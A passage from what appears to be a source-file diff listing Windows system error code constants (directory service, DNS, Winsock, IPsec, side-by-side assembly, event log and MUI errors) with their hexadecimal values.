DS_WKO_CONTAINER_CANNOT_BE_SPECIAL = 0x21A3 + DS_DOMAIN_RENAME_IN_PROGRESS = 0x21A4 + DS_EXISTING_AD_CHILD_NC = 0x21A5 + DS_REPL_LIFETIME_EXCEEDED = 0x21A6 + DS_DISALLOWED_IN_SYSTEM_CONTAINER = 0x21A7 + DS_LDAP_SEND_QUEUE_FULL = 0x21A8 + DS_DRA_OUT_SCHEDULE_WINDOW = 0x21A9 + DS_POLICY_NOT_KNOWN = 0x21AA + NO_SITE_SETTINGS_OBJECT = 0x21AB + NO_SECRETS = 0x21AC + NO_WRITABLE_DC_FOUND = 0x21AD + DS_NO_SERVER_OBJECT = 0x21AE + DS_NO_NTDSA_OBJECT = 0x21AF + DS_NON_ASQ_SEARCH = 0x21B0 + DS_AUDIT_FAILURE = 0x21B1 + DS_INVALID_SEARCH_FLAG_SUBTREE = 0x21B2 + DS_INVALID_SEARCH_FLAG_TUPLE = 0x21B3 + DS_HIERARCHY_TABLE_TOO_DEEP = 0x21B4 + DS_DRA_CORRUPT_UTD_VECTOR = 0x21B5 + DS_DRA_SECRETS_DENIED = 0x21B6 + DS_RESERVED_MAPI_ID = 0x21B7 + DS_MAPI_ID_NOT_AVAILABLE = 0x21B8 + DS_DRA_MISSING_KRBTGT_SECRET = 0x21B9 + DS_DOMAIN_NAME_EXISTS_IN_FOREST = 0x21BA + DS_FLAT_NAME_EXISTS_IN_FOREST = 0x21BB + INVALID_USER_PRINCIPAL_NAME = 0x21BC + DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS = 0x21BD + DS_OID_NOT_FOUND = 0x21BE + DS_DRA_RECYCLED_TARGET = 0x21BF + DNS_RCODE_FORMAT_ERROR = 0x2329 + DNS_RCODE_SERVER_FAILURE = 0x232A + DNS_RCODE_NAME_ERROR = 0x232B + DNS_RCODE_NOT_IMPLEMENTED = 0x232C + DNS_RCODE_REFUSED = 0x232D + DNS_RCODE_YXDOMAIN = 0x232E + DNS_RCODE_YXRRSET = 0x232F + DNS_RCODE_NXRRSET = 0x2330 + DNS_RCODE_NOTAUTH = 0x2331 + DNS_RCODE_NOTZONE = 0x2332 + DNS_RCODE_BADSIG = 0x2338 + DNS_RCODE_BADKEY = 0x2339 + DNS_RCODE_BADTIME = 0x233A + DNS_INFO_NO_RECORDS = 0x251D + DNS_BAD_PACKET = 0x251E + DNS_NO_PACKET = 0x251F + DNS_RCODE = 0x2520 + DNS_UNSECURE_PACKET = 0x2521 + DNS_INVALID_TYPE = 0x254F + DNS_INVALID_IP_ADDRESS = 0x2550 + DNS_INVALID_PROPERTY = 0x2551 + DNS_TRY_AGAIN_LATER = 0x2552 + DNS_NOT_UNIQUE = 0x2553 + DNS_NON_RFC_NAME = 0x2554 + DNS_STATUS_FQDN = 0x2555 + DNS_STATUS_DOTTED_NAME = 0x2556 + DNS_STATUS_SINGLE_PART_NAME = 0x2557 + DNS_INVALID_NAME_CHAR = 0x2558 + DNS_NUMERIC_NAME = 0x2559 + DNS_NOT_ALLOWED_ON_ROOT_SERVER = 0x255A + DNS_NOT_ALLOWED_UNDER_DELEGATION = 0x255B + DNS_CANNOT_FIND_ROOT_HINTS = 0x255C + DNS_INCONSISTENT_ROOT_HINTS = 0x255D + DNS_DWORD_VALUE_TOO_SMALL = 0x255E + DNS_DWORD_VALUE_TOO_LARGE = 0x255F + DNS_BACKGROUND_LOADING = 0x2560 + DNS_NOT_ALLOWED_ON_RODC = 0x2561 + DNS_NOT_ALLOWED_UNDER_DNAME = 0x2562 + DNS_DELEGATION_REQUIRED = 0x2563 + DNS_INVALID_POLICY_TABLE = 0x2564 + DNS_ZONE_DOES_NOT_EXIST = 0x2581 + DNS_NO_ZONE_INFO = 0x2582 + DNS_INVALID_ZONE_OPERATION = 0x2583 + DNS_ZONE_CONFIGURATION_ERROR = 0x2584 + DNS_ZONE_HAS_NO_SOA_RECORD = 0x2585 + DNS_ZONE_HAS_NO_NS_RECORDS = 0x2586 + DNS_ZONE_LOCKED = 0x2587 + DNS_ZONE_CREATION_FAILED = 0x2588 + DNS_ZONE_ALREADY_EXISTS = 0x2589 + DNS_AUTOZONE_ALREADY_EXISTS = 0x258A + DNS_INVALID_ZONE_TYPE = 0x258B + DNS_SECONDARY_REQUIRES_MASTER_IP = 0x258C + DNS_ZONE_NOT_SECONDARY = 0x258D + DNS_NEED_SECONDARY_ADDRESSES = 0x258E + DNS_WINS_INIT_FAILED = 0x258F + DNS_NEED_WINS_SERVERS = 0x2590 + DNS_NBSTAT_INIT_FAILED = 0x2591 + DNS_SOA_DELETE_INVALID = 0x2592 + DNS_FORWARDER_ALREADY_EXISTS = 0x2593 + DNS_ZONE_REQUIRES_MASTER_IP = 0x2594 + DNS_ZONE_IS_SHUTDOWN = 0x2595 + DNS_PRIMARY_REQUIRES_DATAFILE = 0x25B3 + DNS_INVALID_DATAFILE_NAME = 0x25B4 + DNS_DATAFILE_OPEN_FAILURE = 0x25B5 + DNS_FILE_WRITEBACK_FAILED = 0x25B6 + DNS_DATAFILE_PARSING = 0x25B7 + DNS_RECORD_DOES_NOT_EXIST = 0x25E5 + DNS_RECORD_FORMAT = 0x25E6 + DNS_NODE_CREATION_FAILED = 0x25E7 + DNS_UNKNOWN_RECORD_TYPE = 0x25E8 + DNS_RECORD_TIMED_OUT = 0x25E9 + DNS_NAME_NOT_IN_ZONE = 0x25EA + DNS_CNAME_LOOP = 0x25EB + DNS_NODE_IS_CNAME = 0x25EC + DNS_CNAME_COLLISION = 0x25ED + DNS_RECORD_ONLY_AT_ZONE_ROOT = 0x25EE + DNS_RECORD_ALREADY_EXISTS = 0x25EF + DNS_SECONDARY_DATA = 0x25F0 + DNS_NO_CREATE_CACHE_DATA = 0x25F1 + DNS_NAME_DOES_NOT_EXIST = 0x25F2 + DNS_WARNING_PTR_CREATE_FAILED = 0x25F3 + DNS_WARNING_DOMAIN_UNDELETED = 0x25F4 + DNS_DS_UNAVAILABLE = 0x25F5 + DNS_DS_ZONE_ALREADY_EXISTS = 0x25F6 + DNS_NO_BOOTFILE_IF_DS_ZONE = 0x25F7 + DNS_NODE_IS_DNAME = 0x25F8 + DNS_DNAME_COLLISION = 0x25F9 + DNS_ALIAS_LOOP = 0x25FA + DNS_INFO_AXFR_COMPLETE = 0x2617 + DNS_AXFR = 0x2618 + DNS_INFO_ADDED_LOCAL_WINS = 0x2619 + DNS_STATUS_CONTINUE_NEEDED = 0x2649 + DNS_NO_TCPIP = 0x267B + DNS_NO_DNS_SERVERS = 0x267C + DNS_DP_DOES_NOT_EXIST = 0x26AD + DNS_DP_ALREADY_EXISTS = 0x26AE + DNS_DP_NOT_ENLISTED = 0x26AF + DNS_DP_ALREADY_ENLISTED = 0x26B0 + DNS_DP_NOT_AVAILABLE = 0x26B1 + DNS_DP_FSMO_ERROR = 0x26B2 + WSAEINTR = 0x2714 + WSAEBADF = 0x2719 + WSAEACCES = 0x271D + WSAEFAULT = 0x271E + WSAEINVAL = 0x2726 + WSAEMFILE = 0x2728 + WSAEWOULDBLOCK = 0x2733 + WSAEINPROGRESS = 0x2734 + WSAEALREADY = 0x2735 + WSAENOTSOCK = 0x2736 + WSAEDESTADDRREQ = 0x2737 + WSAEMSGSIZE = 0x2738 + WSAEPROTOTYPE = 0x2739 + WSAENOPROTOOPT = 0x273A + WSAEPROTONOSUPPORT = 0x273B + WSAESOCKTNOSUPPORT = 0x273C + WSAEOPNOTSUPP = 0x273D + WSAEPFNOSUPPORT = 0x273E + WSAEAFNOSUPPORT = 0x273F + WSAEADDRINUSE = 0x2740 + WSAEADDRNOTAVAIL = 0x2741 + WSAENETDOWN = 0x2742 + WSAENETUNREACH = 0x2743 + WSAENETRESET = 0x2744 + WSAECONNABORTED = 0x2745 + WSAECONNRESET = 0x2746 + WSAENOBUFS = 0x2747 + WSAEISCONN = 0x2748 + WSAENOTCONN = 0x2749 + WSAESHUTDOWN = 0x274A + WSAETOOMANYREFS = 0x274B + WSAETIMEDOUT = 0x274C + WSAECONNREFUSED = 0x274D + WSAELOOP = 0x274E + WSAENAMETOOLONG = 0x274F + WSAEHOSTDOWN = 0x2750 + WSAEHOSTUNREACH = 0x2751 + WSAENOTEMPTY = 0x2752 + WSAEPROCLIM = 0x2753 + WSAEUSERS = 0x2754 + WSAEDQUOT = 0x2755 + WSAESTALE = 0x2756 + WSAEREMOTE = 0x2757 + WSASYSNOTREADY = 0x276B + WSAVERNOTSUPPORTED = 0x276C + WSANOTINITIALISED = 0x276D + WSAEDISCON = 0x2775 + WSAENOMORE = 0x2776 + WSAECANCELLED = 0x2777 + WSAEINVALIDPROCTABLE = 0x2778 + WSAEINVALIDPROVIDER = 0x2779 + WSAEPROVIDERFAILEDINIT = 0x277A + WSASYSCALLFAILURE = 0x277B + WSASERVICE_NOT_FOUND = 0x277C + WSATYPE_NOT_FOUND = 0x277D + WSA_E_NO_MORE = 0x277E + WSA_E_CANCELLED = 0x277F + WSAEREFUSED = 0x2780 + WSAHOST_NOT_FOUND = 0x2AF9 + WSATRY_AGAIN = 0x2AFA + WSANO_RECOVERY = 0x2AFB + WSANO_DATA = 0x2AFC + WSA_QOS_RECEIVERS = 0x2AFD + WSA_QOS_SENDERS = 0x2AFE + WSA_QOS_NO_SENDERS = 0x2AFF + WSA_QOS_NO_RECEIVERS = 0x2B00 + WSA_QOS_REQUEST_CONFIRMED = 0x2B01 + WSA_QOS_ADMISSION_FAILURE = 0x2B02 + WSA_QOS_POLICY_FAILURE = 0x2B03 + WSA_QOS_BAD_STYLE = 0x2B04 + WSA_QOS_BAD_OBJECT = 0x2B05 + WSA_QOS_TRAFFIC_CTRL_ERROR = 0x2B06 + WSA_QOS_GENERIC_ERROR = 0x2B07 + WSA_QOS_ESERVICETYPE = 0x2B08 + WSA_QOS_EFLOWSPEC = 0x2B09 + WSA_QOS_EPROVSPECBUF = 0x2B0A + WSA_QOS_EFILTERSTYLE = 0x2B0B + WSA_QOS_EFILTERTYPE = 0x2B0C + WSA_QOS_EFILTERCOUNT = 0x2B0D + WSA_QOS_EOBJLENGTH = 0x2B0E + WSA_QOS_EFLOWCOUNT = 0x2B0F + WSA_QOS_EUNKNOWNPSOBJ = 0x2B10 + WSA_QOS_EPOLICYOBJ = 0x2B11 + WSA_QOS_EFLOWDESC = 0x2B12 + WSA_QOS_EPSFLOWSPEC = 0x2B13 + WSA_QOS_EPSFILTERSPEC = 0x2B14 + WSA_QOS_ESDMODEOBJ = 0x2B15 + WSA_QOS_ESHAPERATEOBJ = 0x2B16 + WSA_QOS_RESERVED_PETYPE = 0x2B17 + IPSEC_QM_POLICY_EXISTS = 0x32C8 + IPSEC_QM_POLICY_NOT_FOUND = 0x32C9 + IPSEC_QM_POLICY_IN_USE = 0x32CA + IPSEC_MM_POLICY_EXISTS = 0x32CB + IPSEC_MM_POLICY_NOT_FOUND = 0x32CC + IPSEC_MM_POLICY_IN_USE = 0x32CD + IPSEC_MM_FILTER_EXISTS = 0x32CE + IPSEC_MM_FILTER_NOT_FOUND = 0x32CF + IPSEC_TRANSPORT_FILTER_EXISTS = 0x32D0 + IPSEC_TRANSPORT_FILTER_NOT_FOUND = 0x32D1 + IPSEC_MM_AUTH_EXISTS = 0x32D2 + IPSEC_MM_AUTH_NOT_FOUND = 0x32D3 + IPSEC_MM_AUTH_IN_USE = 0x32D4 + IPSEC_DEFAULT_MM_POLICY_NOT_FOUND = 0x32D5 + IPSEC_DEFAULT_MM_AUTH_NOT_FOUND = 0x32D6 + IPSEC_DEFAULT_QM_POLICY_NOT_FOUND = 0x32D7 + IPSEC_TUNNEL_FILTER_EXISTS = 0x32D8 + IPSEC_TUNNEL_FILTER_NOT_FOUND = 0x32D9 + IPSEC_MM_FILTER_PENDING_DELETION = 0x32DA + IPSEC_TRANSPORT_FILTER_PENDING_DELETION = 0x32DB + IPSEC_TUNNEL_FILTER_PENDING_DELETION = 0x32DC + IPSEC_MM_POLICY_PENDING_DELETION = 0x32DD + IPSEC_MM_AUTH_PENDING_DELETION = 0x32DE + IPSEC_QM_POLICY_PENDING_DELETION = 0x32DF + WARNING_IPSEC_MM_POLICY_PRUNED = 0x32E0 + WARNING_IPSEC_QM_POLICY_PRUNED = 0x32E1 + IPSEC_IKE_AUTH_FAIL = 0x35E9 + IPSEC_IKE_ATTRIB_FAIL = 0x35EA + IPSEC_IKE_NEGOTIATION_PENDING = 0x35EB + IPSEC_IKE_GENERAL_PROCESSING_ERROR = 0x35EC + IPSEC_IKE_TIMED_OUT = 0x35ED + IPSEC_IKE_NO_CERT = 0x35EE + IPSEC_IKE_SA_DELETED = 0x35EF + IPSEC_IKE_SA_REAPED = 0x35F0 + IPSEC_IKE_MM_ACQUIRE_DROP = 0x35F1 + IPSEC_IKE_QM_ACQUIRE_DROP = 0x35F2 + IPSEC_IKE_QUEUE_DROP_MM = 0x35F3 + IPSEC_IKE_QUEUE_DROP_NO_MM = 0x35F4 + IPSEC_IKE_DROP_NO_RESPONSE = 0x35F5 + IPSEC_IKE_MM_DELAY_DROP = 0x35F6 + IPSEC_IKE_QM_DELAY_DROP = 0x35F7 + IPSEC_IKE_ERROR = 0x35F8 + IPSEC_IKE_CRL_FAILED = 0x35F9 + IPSEC_IKE_INVALID_KEY_USAGE = 0x35FA + IPSEC_IKE_INVALID_CERT_TYPE = 0x35FB + IPSEC_IKE_NO_PRIVATE_KEY = 0x35FC + IPSEC_IKE_DH_FAIL = 0x35FE + IPSEC_IKE_CRITICAL_PAYLOAD_NOT_RECOGNIZED = 0x35FF + IPSEC_IKE_INVALID_HEADER = 0x3600 + IPSEC_IKE_NO_POLICY = 0x3601 + IPSEC_IKE_INVALID_SIGNATURE = 0x3602 + IPSEC_IKE_KERBEROS_ERROR = 0x3603 + IPSEC_IKE_NO_PUBLIC_KEY = 0x3604 + IPSEC_IKE_PROCESS_ERR = 0x3605 + IPSEC_IKE_PROCESS_ERR_SA = 0x3606 + IPSEC_IKE_PROCESS_ERR_PROP = 0x3607 + IPSEC_IKE_PROCESS_ERR_TRANS = 0x3608 + IPSEC_IKE_PROCESS_ERR_KE = 0x3609 + IPSEC_IKE_PROCESS_ERR_ID = 0x360A + IPSEC_IKE_PROCESS_ERR_CERT = 0x360B + IPSEC_IKE_PROCESS_ERR_CERT_REQ = 0x360C + IPSEC_IKE_PROCESS_ERR_HASH = 0x360D + IPSEC_IKE_PROCESS_ERR_SIG = 0x360E + IPSEC_IKE_PROCESS_ERR_NONCE = 0x360F + IPSEC_IKE_PROCESS_ERR_NOTIFY = 0x3610 + IPSEC_IKE_PROCESS_ERR_DELETE = 0x3611 + IPSEC_IKE_PROCESS_ERR_VENDOR = 0x3612 + IPSEC_IKE_INVALID_PAYLOAD = 0x3613 + IPSEC_IKE_LOAD_SOFT_SA = 0x3614 + IPSEC_IKE_SOFT_SA_TORN_DOWN = 0x3615 + IPSEC_IKE_INVALID_COOKIE = 0x3616 + IPSEC_IKE_NO_PEER_CERT = 0x3617 + IPSEC_IKE_PEER_CRL_FAILED = 0x3618 + IPSEC_IKE_POLICY_CHANGE = 0x3619 + IPSEC_IKE_NO_MM_POLICY = 0x361A + IPSEC_IKE_NOTCBPRIV = 0x361B + IPSEC_IKE_SECLOADFAIL = 0x361C + IPSEC_IKE_FAILSSPINIT = 0x361D + IPSEC_IKE_FAILQUERYSSP = 0x361E + IPSEC_IKE_SRVACQFAIL = 0x361F + IPSEC_IKE_SRVQUERYCRED = 0x3620 + IPSEC_IKE_GETSPIFAIL = 0x3621 + IPSEC_IKE_INVALID_FILTER = 0x3622 + IPSEC_IKE_OUT_OF_MEMORY = 0x3623 + IPSEC_IKE_ADD_UPDATE_KEY_FAILED = 0x3624 + IPSEC_IKE_INVALID_POLICY = 0x3625 + IPSEC_IKE_UNKNOWN_DOI = 0x3626 + IPSEC_IKE_INVALID_SITUATION = 0x3627 + IPSEC_IKE_DH_FAILURE = 0x3628 + IPSEC_IKE_INVALID_GROUP = 0x3629 + IPSEC_IKE_ENCRYPT = 0x362A + IPSEC_IKE_DECRYPT = 0x362B + IPSEC_IKE_POLICY_MATCH = 0x362C + IPSEC_IKE_UNSUPPORTED_ID = 0x362D + IPSEC_IKE_INVALID_HASH = 0x362E + IPSEC_IKE_INVALID_HASH_ALG = 0x362F + IPSEC_IKE_INVALID_HASH_SIZE = 0x3630 + IPSEC_IKE_INVALID_ENCRYPT_ALG = 0x3631 + IPSEC_IKE_INVALID_AUTH_ALG = 0x3632 + IPSEC_IKE_INVALID_SIG = 0x3633 + IPSEC_IKE_LOAD_FAILED = 0x3634 + IPSEC_IKE_RPC_DELETE = 0x3635 + IPSEC_IKE_BENIGN_REINIT = 0x3636 + IPSEC_IKE_INVALID_RESPONDER_LIFETIME_NOTIFY = 0x3637 + IPSEC_IKE_QM_LIMIT_REAP = 0x3638 + IPSEC_IKE_INVALID_CERT_KEYLEN = 0x3639 + IPSEC_IKE_MM_LIMIT = 0x363A + IPSEC_IKE_NEGOTIATION_DISABLED = 0x363B + IPSEC_IKE_QM_LIMIT = 0x363C + IPSEC_IKE_MM_EXPIRED = 0x363D + IPSEC_IKE_PEER_MM_ASSUMED_INVALID = 0x363E + IPSEC_IKE_CERT_CHAIN_POLICY_MISMATCH = 0x363F + IPSEC_IKE_UNEXPECTED_MESSAGE_ID = 0x3640 + IPSEC_IKE_INVALID_AUTH_PAYLOAD = 0x3641 + IPSEC_IKE_DOS_COOKIE_SENT = 0x3642 + IPSEC_IKE_SHUTTING_DOWN = 0x3643 + IPSEC_IKE_CGA_AUTH_FAILED = 0x3644 + IPSEC_IKE_PROCESS_ERR_NATOA = 0x3645 + IPSEC_IKE_INVALID_MM_FOR_QM = 0x3646 + IPSEC_IKE_QM_EXPIRED = 0x3647 + IPSEC_IKE_TOO_MANY_FILTERS = 0x3648 + IPSEC_IKE_NEG_STATUS_END = 0x3649 + IPSEC_IKE_KILL_DUMMY_NAP_TUNNEL = 0x364A + IPSEC_IKE_INNER_IP_ASSIGNMENT_FAILURE = 0x364B + IPSEC_IKE_REQUIRE_CP_PAYLOAD_MISSING = 0x364C + IPSEC_KEY_MODULE_IMPERSONATION_NEGOTIATION_PENDING = 0x364D + IPSEC_IKE_COEXISTENCE_SUPPRESS = 0x364E + IPSEC_IKE_RATELIMIT_DROP = 0x364F + IPSEC_IKE_PEER_DOESNT_SUPPORT_MOBIKE = 0x3650 + IPSEC_IKE_AUTHORIZATION_FAILURE = 0x3651 + IPSEC_IKE_STRONG_CRED_AUTHORIZATION_FAILURE = 0x3652 + IPSEC_IKE_AUTHORIZATION_FAILURE_WITH_OPTIONAL_RETRY = 0x3653 + IPSEC_IKE_STRONG_CRED_AUTHORIZATION_AND_CERTMAP_FAILURE = 0x3654 + IPSEC_BAD_SPI = 0x3656 + IPSEC_SA_LIFETIME_EXPIRED = 0x3657 + IPSEC_WRONG_SA = 0x3658 + IPSEC_REPLAY_CHECK_FAILED = 0x3659 + IPSEC_INVALID_PACKET = 0x365A + IPSEC_INTEGRITY_CHECK_FAILED = 0x365B + IPSEC_CLEAR_TEXT_DROP = 0x365C + IPSEC_AUTH_FIREWALL_DROP = 0x365D + IPSEC_THROTTLE_DROP = 0x365E + IPSEC_DOSP_BLOCK = 0x3665 + IPSEC_DOSP_RECEIVED_MULTICAST = 0x3666 + IPSEC_DOSP_INVALID_PACKET = 0x3667 + IPSEC_DOSP_STATE_LOOKUP_FAILED = 0x3668 + IPSEC_DOSP_MAX_ENTRIES = 0x3669 + IPSEC_DOSP_KEYMOD_NOT_ALLOWED = 0x366A + IPSEC_DOSP_NOT_INSTALLED = 0x366B + IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES = 0x366C + SXS_SECTION_NOT_FOUND = 0x36B0 + SXS_CANT_GEN_ACTCTX = 0x36B1 + SXS_INVALID_ACTCTXDATA_FORMAT = 0x36B2 + SXS_ASSEMBLY_NOT_FOUND = 0x36B3 + SXS_MANIFEST_FORMAT_ERROR = 0x36B4 + SXS_MANIFEST_PARSE_ERROR = 0x36B5 + SXS_ACTIVATION_CONTEXT_DISABLED = 0x36B6 + SXS_KEY_NOT_FOUND = 0x36B7 + SXS_VERSION_CONFLICT = 0x36B8 + SXS_WRONG_SECTION_TYPE = 0x36B9 + SXS_THREAD_QUERIES_DISABLED = 0x36BA + SXS_PROCESS_DEFAULT_ALREADY_SET = 0x36BB + SXS_UNKNOWN_ENCODING_GROUP = 0x36BC + SXS_UNKNOWN_ENCODING = 0x36BD + SXS_INVALID_XML_NAMESPACE_URI = 0x36BE + SXS_ROOT_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36BF + SXS_LEAF_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36C0 + SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36C1 + SXS_MANIFEST_MISSING_REQUIRED_DEFAULT_NAMESPACE = 0x36C2 + SXS_MANIFEST_INVALID_REQUIRED_DEFAULT_NAMESPACE = 0x36C3 + SXS_PRIVATE_MANIFEST_CROSS_PATH_WITH_REPARSE_POINT = 0x36C4 + SXS_DUPLICATE_DLL_NAME = 0x36C5 + SXS_DUPLICATE_WINDOWCLASS_NAME = 0x36C6 + SXS_DUPLICATE_CLSID = 0x36C7 + SXS_DUPLICATE_IID = 0x36C8 + SXS_DUPLICATE_TLBID = 0x36C9 + SXS_DUPLICATE_PROGID = 0x36CA + SXS_DUPLICATE_ASSEMBLY_NAME = 0x36CB + SXS_FILE_HASH_MISMATCH = 0x36CC + SXS_POLICY_PARSE_ERROR = 0x36CD + SXS_XML_E_MISSINGQUOTE = 0x36CE + SXS_XML_E_COMMENTSYNTAX = 0x36CF + SXS_XML_E_BADSTARTNAMECHAR = 0x36D0 + SXS_XML_E_BADNAMECHAR = 0x36D1 + SXS_XML_E_BADCHARINSTRING = 0x36D2 + SXS_XML_E_XMLDECLSYNTAX = 0x36D3 + SXS_XML_E_BADCHARDATA = 0x36D4 + SXS_XML_E_MISSINGWHITESPACE = 0x36D5 + SXS_XML_E_EXPECTINGTAGEND = 0x36D6 + SXS_XML_E_MISSINGSEMICOLON = 0x36D7 + SXS_XML_E_UNBALANCEDPAREN = 0x36D8 + SXS_XML_E_INTERNALERROR = 0x36D9 + SXS_XML_E_UNEXPECTED_WHITESPACE = 0x36DA + SXS_XML_E_INCOMPLETE_ENCODING = 0x36DB + SXS_XML_E_MISSING_PAREN = 0x36DC + SXS_XML_E_EXPECTINGCLOSEQUOTE = 0x36DD + SXS_XML_E_MULTIPLE_COLONS = 0x36DE + SXS_XML_E_INVALID_DECIMAL = 0x36DF + SXS_XML_E_INVALID_HEXIDECIMAL = 0x36E0 + SXS_XML_E_INVALID_UNICODE = 0x36E1 + SXS_XML_E_WHITESPACEORQUESTIONMARK = 0x36E2 + SXS_XML_E_UNEXPECTEDENDTAG = 0x36E3 + SXS_XML_E_UNCLOSEDTAG = 0x36E4 + SXS_XML_E_DUPLICATEATTRIBUTE = 0x36E5 + SXS_XML_E_MULTIPLEROOTS = 0x36E6 + SXS_XML_E_INVALIDATROOTLEVEL = 0x36E7 + SXS_XML_E_BADXMLDECL = 0x36E8 + SXS_XML_E_MISSINGROOT = 0x36E9 + SXS_XML_E_UNEXPECTEDEOF = 0x36EA + SXS_XML_E_BADPEREFINSUBSET = 0x36EB + SXS_XML_E_UNCLOSEDSTARTTAG = 0x36EC + SXS_XML_E_UNCLOSEDENDTAG = 0x36ED + SXS_XML_E_UNCLOSEDSTRING = 0x36EE + SXS_XML_E_UNCLOSEDCOMMENT = 0x36EF + SXS_XML_E_UNCLOSEDDECL = 0x36F0 + SXS_XML_E_UNCLOSEDCDATA = 0x36F1 + SXS_XML_E_RESERVEDNAMESPACE = 0x36F2 + SXS_XML_E_INVALIDENCODING = 0x36F3 + SXS_XML_E_INVALIDSWITCH = 0x36F4 + SXS_XML_E_BADXMLCASE = 0x36F5 + SXS_XML_E_INVALID_STANDALONE = 0x36F6 + SXS_XML_E_UNEXPECTED_STANDALONE = 0x36F7 + SXS_XML_E_INVALID_VERSION = 0x36F8 + SXS_XML_E_MISSINGEQUALS = 0x36F9 + SXS_PROTECTION_RECOVERY_FAILED = 0x36FA + SXS_PROTECTION_PUBLIC_KEY_TOO_SHORT = 0x36FB + SXS_PROTECTION_CATALOG_NOT_VALID = 0x36FC + SXS_UNTRANSLATABLE_HRESULT = 0x36FD + SXS_PROTECTION_CATALOG_FILE_MISSING = 0x36FE + SXS_MISSING_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36FF + SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE_NAME = 0x3700 + SXS_ASSEMBLY_MISSING = 0x3701 + SXS_CORRUPT_ACTIVATION_STACK = 0x3702 + SXS_CORRUPTION = 0x3703 + SXS_EARLY_DEACTIVATION = 0x3704 + SXS_INVALID_DEACTIVATION = 0x3705 + SXS_MULTIPLE_DEACTIVATION = 0x3706 + SXS_PROCESS_TERMINATION_REQUESTED = 0x3707 + SXS_RELEASE_ACTIVATION_CONTEXT = 0x3708 + SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY = 0x3709 + SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE = 0x370A + SXS_INVALID_IDENTITY_ATTRIBUTE_NAME = 0x370B + SXS_IDENTITY_DUPLICATE_ATTRIBUTE = 0x370C + SXS_IDENTITY_PARSE_ERROR = 0x370D + MALFORMED_SUBSTITUTION_STRING = 0x370E + SXS_INCORRECT_PUBLIC_KEY_TOKEN = 0x370F + UNMAPPED_SUBSTITUTION_STRING = 0x3710 + SXS_ASSEMBLY_NOT_LOCKED = 0x3711 + SXS_COMPONENT_STORE_CORRUPT = 0x3712 + ADVANCED_INSTALLER_FAILED = 0x3713 + XML_ENCODING_MISMATCH = 0x3714 + SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT = 0x3715 + SXS_IDENTITIES_DIFFERENT = 0x3716 + SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT = 0x3717 + SXS_FILE_NOT_PART_OF_ASSEMBLY = 0x3718 + SXS_MANIFEST_TOO_BIG = 0x3719 + SXS_SETTING_NOT_REGISTERED = 0x371A + SXS_TRANSACTION_CLOSURE_INCOMPLETE = 0x371B + SMI_PRIMITIVE_INSTALLER_FAILED = 0x371C + GENERIC_COMMAND_FAILED = 0x371D + SXS_FILE_HASH_MISSING = 0x371E + EVT_INVALID_CHANNEL_PATH = 0x3A98 + EVT_INVALID_QUERY = 0x3A99 + EVT_PUBLISHER_METADATA_NOT_FOUND = 0x3A9A + EVT_EVENT_TEMPLATE_NOT_FOUND = 0x3A9B + EVT_INVALID_PUBLISHER_NAME = 0x3A9C + EVT_INVALID_EVENT_DATA = 0x3A9D + EVT_CHANNEL_NOT_FOUND = 0x3A9F + EVT_MALFORMED_XML_TEXT = 0x3AA0 + EVT_SUBSCRIPTION_TO_DIRECT_CHANNEL = 0x3AA1 + EVT_CONFIGURATION_ERROR = 0x3AA2 + EVT_QUERY_RESULT_STALE = 0x3AA3 + EVT_QUERY_RESULT_INVALID_POSITION = 0x3AA4 + EVT_NON_VALIDATING_MSXML = 0x3AA5 + EVT_FILTER_ALREADYSCOPED = 0x3AA6 + EVT_FILTER_NOTELTSET = 0x3AA7 + EVT_FILTER_INVARG = 0x3AA8 + EVT_FILTER_INVTEST = 0x3AA9 + EVT_FILTER_INVTYPE = 0x3AAA + EVT_FILTER_PARSEERR = 0x3AAB + EVT_FILTER_UNSUPPORTEDOP = 0x3AAC + EVT_FILTER_UNEXPECTEDTOKEN = 0x3AAD + EVT_INVALID_OPERATION_OVER_ENABLED_DIRECT_CHANNEL = 0x3AAE + EVT_INVALID_CHANNEL_PROPERTY_VALUE = 0x3AAF + EVT_INVALID_PUBLISHER_PROPERTY_VALUE = 0x3AB0 + EVT_CHANNEL_CANNOT_ACTIVATE = 0x3AB1 + EVT_FILTER_TOO_COMPLEX = 0x3AB2 + EVT_MESSAGE_NOT_FOUND = 0x3AB3 + EVT_MESSAGE_ID_NOT_FOUND = 0x3AB4 + EVT_UNRESOLVED_VALUE_INSERT = 0x3AB5 + EVT_UNRESOLVED_PARAMETER_INSERT = 0x3AB6 + EVT_MAX_INSERTS_REACHED = 0x3AB7 + EVT_EVENT_DEFINITION_NOT_FOUND = 0x3AB8 + EVT_MESSAGE_LOCALE_NOT_FOUND = 0x3AB9 + EVT_VERSION_TOO_OLD = 0x3ABA + EVT_VERSION_TOO_NEW = 0x3ABB + EVT_CANNOT_OPEN_CHANNEL_OF_QUERY = 0x3ABC + EVT_PUBLISHER_DISABLED = 0x3ABD + EVT_FILTER_OUT_OF_RANGE = 0x3ABE + EC_SUBSCRIPTION_CANNOT_ACTIVATE = 0x3AE8 + EC_LOG_DISABLED = 0x3AE9 + EC_CIRCULAR_FORWARDING = 0x3AEA + EC_CREDSTORE_FULL = 0x3AEB + EC_CRED_NOT_FOUND = 0x3AEC + EC_NO_ACTIVE_CHANNEL = 0x3AED + MUI_FILE_NOT_FOUND = 0x3AFC + MUI_INVALID_FILE = 0x3AFD + MUI_INVALID_RC_CONFIG = 0x3AFE + MUI_INVALID_LOCALE_NAME = 0x3AFF + MUI_INVALID_ULTIMATEFALLBACK_NAME = 0x3B00 + MUI_FILE_NOT_LOADED = 0x3B01 + RESOURCE_ENUM_USER_STOP = 0x3B02 + MUI_INTLSETTINGS_UILANG_NOT_INSTALLED = 0x3B03 + MUI_INTLSETTINGS_INVALID_LOCALE_NAME = 0x3B04 + MCA_INVALID_CAPABILITIES_STRING = 0x3B60 + MCA_INVALID_VCP_VERSION = 0x3B61 + MCA_MONITOR_VIOLATES_MCCS_SPECIFICATION = 0x3B62 + 